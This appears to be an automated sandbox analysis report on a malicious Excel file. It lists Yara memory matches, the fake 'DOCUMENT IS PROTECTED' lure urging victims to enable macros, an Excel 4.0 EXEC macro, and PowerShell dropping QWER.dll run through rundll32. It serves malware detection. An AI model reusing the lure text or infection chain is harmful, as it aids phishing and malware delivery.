Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 Previewing is not available for protected documents. 16 17 Yo
Source: Screenshot number: 4	Screenshot OCR: protected documents. 16 17 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24 25 26 27 28 29 3
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 , , Previewing is not available for protected documents. 16 ::
Source: Screenshot number: 8	Screenshot OCR: protected documents. 16 :: You have to press :ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI 25 26 27 28 29

Document contains OLE streams with names of living off the land binaries

Source: 364453688149503140239183.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: 364453688149503140239183.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QWER.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: 364453688149503140239183.xls	Initial sample: EXEC
Source: 364453688149503140239183.xls	Initial sample: EXEC

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10036007	9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041050	9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003130F	9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100323E2	9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030460	9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041592	9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003E59F	9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003960C	9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100317E2	9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10040B0E	9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10031BB6	9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041C56	9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10036CB5	9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1001CD16	9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10042D21	9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10031FC2	9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F8FD	9_2_0034F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E991	9_2_0034E991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034AB87	9_2_0034AB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349011	9_2_00349011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00350001	9_2_00350001
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035907F	9_2_0035907F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00360056	9_2_00360056
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342051	9_2_00342051
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003470B3	9_2_003470B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003520BA	9_2_003520BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F09B	9_2_0034F09B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00354116	9_2_00354116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003481B7	9_2_003481B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003451BB	9_2_003451BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342251	9_2_00342251
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035A2E8	9_2_0035A2E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B2C7	9_2_0034B2C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E2CC	9_2_0034E2CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00345361	9_2_00345361
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00344346	9_2_00344346
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C3A0	9_2_0035C3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003613AD	9_2_003613AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035E395	9_2_0035E395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035D389	9_2_0035D389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035F435	9_2_0035F435
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035044F	9_2_0035044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003464E2	9_2_003464E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00358519	9_2_00358519
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00352550	9_2_00352550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034A55F	9_2_0034A55F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00345548	9_2_00345548
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003595FA	9_2_003595FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E5CF	9_2_0034E5CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C631	9_2_0035C631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00358606	9_2_00358606
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035A666	9_2_0035A666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034D6D8	9_2_0034D6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003566CA	9_2_003566CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00347735	9_2_00347735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035473C	9_2_0035473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349714	9_2_00349714
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035176B	9_2_0035176B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B74D	9_2_0034B74D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00344816	9_2_00344816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00351889	9_2_00351889
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00348969	9_2_00348969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035894B	9_2_0035894B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003609B5	9_2_003609B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003459F2	9_2_003459F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035AA30	9_2_0035AA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00341A56	9_2_00341A56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034EA99	9_2_0034EA99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00348B3D	9_2_00348B3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035BB23	9_2_0035BB23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00350B19	9_2_00350B19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034BB7E	9_2_0034BB7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035CB5B	9_2_0035CB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00357BA6	9_2_00357BA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00354B87	9_2_00354B87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349B83	9_2_00349B83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00358BE3	9_2_00358BE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035DBEA	9_2_0035DBEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342BD9	9_2_00342BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00359BCF	9_2_00359BCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00347C37	9_2_00347C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00343C3C	9_2_00343C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035AC3A	9_2_0035AC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00360C14	9_2_00360C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00344C5D	9_2_00344C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00356C49	9_2_00356C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035DCF7	9_2_0035DCF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00355CC4	9_2_00355CC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00346D24	9_2_00346D24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00356DF8	9_2_00356DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00357DD5	9_2_00357DD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349DCF	9_2_00349DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00343E3F	9_2_00343E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00360E3A	9_2_00360E3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035BE27	9_2_0035BE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00345E60	9_2_00345E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035AE6D	9_2_0035AE6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00350E53	9_2_00350E53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034EE81	9_2_0034EE81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034AEFB	9_2_0034AEFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00344EE3	9_2_00344EE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00359EEC	9_2_00359EEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035DEDC	9_2_0035DEDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00360F33	9_2_00360F33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034CF47	9_2_0034CF47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00347FF2	9_2_00347FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034DFF3	9_2_0034DFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E9011	10_2_001E9011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E3C3C	10_2_001E3C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F044F	10_2_001F044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F20BA	10_2_001F20BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001ED6D8	10_2_001ED6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EF8FD	10_2_001EF8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4116	10_2_001F4116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002013AD	10_2_002013AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EAB87	10_2_001EAB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F95FA	10_2_001F95FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E7FF2	10_2_001E7FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E59F2	10_2_001E59F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E4816	10_2_001E4816
